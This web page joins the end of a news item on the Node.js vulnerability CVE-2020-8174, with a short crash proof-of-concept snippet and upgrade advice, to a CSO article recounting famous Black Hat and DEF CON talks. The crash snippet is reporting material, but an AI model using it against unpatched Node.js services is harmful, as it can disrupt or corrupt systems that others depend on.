The OpenJS Foundation, the legal entity responsible for Node.js, published a security advisory in June 2020 acknowledging Tobias’s findings as a high-severity vulnerability: “napi_get_value_string_*() allows various kinds of memory corruption (High) (CVE-2020-8174)”.

The advisory urges everyone to upgrade their Node.js instances, because versions 10.x, 12.x and 14.x of Node.js contain the vulnerable functions.

No one has yet published code to exploit this vulnerability as of this writing. A proof-of-concept exploit is likely to be developed, and it may be released publicly or remain private. Since Node.js is used by a large chunk of software, there is demand for dangerous software exploits.

A crash proof of concept is provided by the author:

    Napi::Value Test(const Napi::CallbackInfo& info) {
      char buf[1];
      // This should be a valid call, e.g., due to a malloc(0).
      napi_get_value_string_latin1(info.Env(), info[0], buf, 0, nullptr);
      return info.Env().Undefined();
    }

    const binding = require('bindings')('validation');
    console.log(binding.test('this could be code that might later be executed'));

What can you do?

Update all your Node.js instances to the latest version, which you can find at https://nodejs.org/en/.

Read the original and more:

-

Omer Yair - ROP - From Zero to Nation State In 25 Minutes

-

11 top DEF CON and Black Hat talks of all time

Hacker summer camp is almost upon us again. Here are some of the best talks of all time. Will this year's virtual talks measure up to these legends?

By J.M. Porup and Lucian Constantin

CSO | Jul 21, 2020 3:00 am PDT

BeeBright / Getty Images

Since 1997, the Black Hat and DEF CON events have gained a reputation for presenting some of the most cutting-edge research in information security. The events have also had their share of controversy – sometimes enough to cause last-minute cancelations. For example, Chris Paget was forced to cancel his Black Hat RFID for Beginners talk in 2007 under threat of litigation from secure card maker HID Corp.

Launched as a single conference in 1997, Black Hat has gone international with annual events in the U.S., Europe and Asia. This year’s virtual U.S. event begins August 1 with four days of technical training, followed by the two-day main conference. DEF CON began in 1993 and also takes place virtually from August 6 to 9.

CSO looks at some of the past Black Hat and DEF CON highlights.

1. The Jeep hack

Who can forget 0xcharlie's hack of a Jeep--with WIRED reporter Andy Greenberg inside? Security researchers Charlie Miller and Chris Valasek presented their findings at Black Hat 2015, and showed how they remotely hacked a Jeep and took control of the vehicle, including the transmission, accelerator and brakes. Their previous research had focused on an attack that required physical access to the targeted vehicle, results that auto manufacturers pooh-poohed. The remote, wireless attack, however, made everyone sit up and take notice.

2. Steal everything, kill everybody

Jayson E. Street's famous DEF CON 19 talk on social engineering, in which he explains how he can walk in almost anywhere and could "steal everything, kill everybody" if he wanted to, remains a perennial favorite all these years later. Who cares if your enterprise is compliant if a random dude in a janitor's uniform comes in and pulls the plug on your business? Street bluntly lays out the secure sites he's talked his way into, what he could have done, and hammers home the need for defense in depth against social engineering attacks.

3. Hacking driverless vehicles

Seems inevitable, right? But sometimes you need a proof of concept to drive the point home (pun intended), and security researcher Zoz did just that at DEF CON 21 with his talk "Hacking driverless vehicles". While driverless vehicles hold the potential to reduce traffic fatalities--turns out humans are really bad drivers--they also introduce new, catastrophic risk that is less likely but far more severe in impact. "With this talk Zoz aims to both inspire unmanned vehicle fans to think about robustness to adversarial and malicious scenarios, and to give the paranoid false hope of resisting the robot revolution," the talk description says, and the scary thing is not much has changed since he delivered his talk in 2013.

4. Barnaby Jack and ATMs

RIP Barnaby Jack. The late, great hacker and showman made ATMs spit cash all over a stage in 2010 and will always be remembered for his exploits, and his untimely death just weeks before yet another blockbuster Vegas talk on medical device security. In the finest tradition of security research, Jack sought to provoke manufacturers to improve the security posture of their devices. The New Zealander was living in San Francisco when he died of a drug overdose, sparking conspiracy theories among some in the hacker community.

5. Back Orifice

Cult of the Dead Cow has been much in the news of late, and their Back Orifice talk at DEF CON in 1999 was a classic--and one that's been getting renewed attention due to Joseph Menn's new book, "Cult of the Dead Cow," that traces the history of that hacking group. Back Orifice was a malware proof of concept designed to backdoor enterprise Windows 2000 systems. Their motive? To force Microsoft to acknowledge the rampant insecurities in their operating systems. One can trace a direct line from provocations like Back Orifice to the famous 2002 Bill Gates memo on trustworthy computing, when the then-CEO of Microsoft laid out security as job #1 going forward for Microsoft.

6. Blue Pill

Joanna Rutkowska's legendary talk on subverting hypervisor security is one for the history books. Named after the Matrix "blue pill"--a drug that makes the fake world look real--the Blue Pill exploit made quite the splash at Black Hat 2006.

"The idea behind Blue Pill is simple: Your operating system swallows the Blue Pill and it awakes inside the Matrix controlled by the ultra-thin Blue Pill hypervisor," Rutkowska wrote at the time. "This all happens on-the-fly (i.e., without restarting the system) and there is no performance penalty and all the devices, like graphics card, are fully accessible to the operating system, which is now executing inside virtual machine."

Since then, Rutkowska has turned her offensive genius to play defense, and launched the high security Qubes operating system, a hardened Xen distribution for laptops.

7. Bluesnarfing and the BlueSniper rifle

While modern smartphones are minicomputers that use a range of wireless protocols, including WiFi, to transfer data, 2004 was very much still the age of feature phones. The first iPhone wouldn't come out for another three years. Back in those days, the most popular wireless data transfer technology on cell phones was Bluetooth, and while it didn't have great security and people often left it open, the phone manufacturers of the day believed the risk of attack to be low because Bluetooth is a short-range protocol.

That argument was again brought up when researchers Adam Laurie and Martin Herfurt demonstrated several vulnerabilities and attacks against Bluetooth implementations at the Black Hat and DEF CON conferences in 2004 that could allow attackers to turn phones into listening devices or to download agenda, calendar appointments or text messages from phones without authorization. They dubbed their attacks bluebugging and bluesnarfing.

A researcher named John Hering then took the threat to another level by demonstrating the feasibility of Bluetooth-based attacks from over a mile away using a device equipped with a semi-directional antenna that resembled a rifle. The BlueSniper rifle was born.

8. The Kaminsky bug

In 2008, security researcher Dan Kaminsky discovered a fundamental flaw in the Domain Name System (DNS) protocol that affected the most widely used DNS server software. The flaw allowed attackers to poison the cache of DNS servers used by telecommunications providers and large organizations and force them to return rogue responses to DNS queries. This enabled website spoofing, email interception and a range of other attacks.

With DNS being one of the core internet protocols, the bug triggered one of the biggest coordinated patching efforts in history. It also sped up the adoption and deployment of the Domain Name System Security Extensions (DNSSEC), which add digital signatures to DNS records. Since 2010 Kaminsky has been one of the seven DNSSEC Recovery Key Share Holders, people from around the world whose individual keys are needed in the recovery process for the DNSSEC root key in case it's lost in a catastrophe.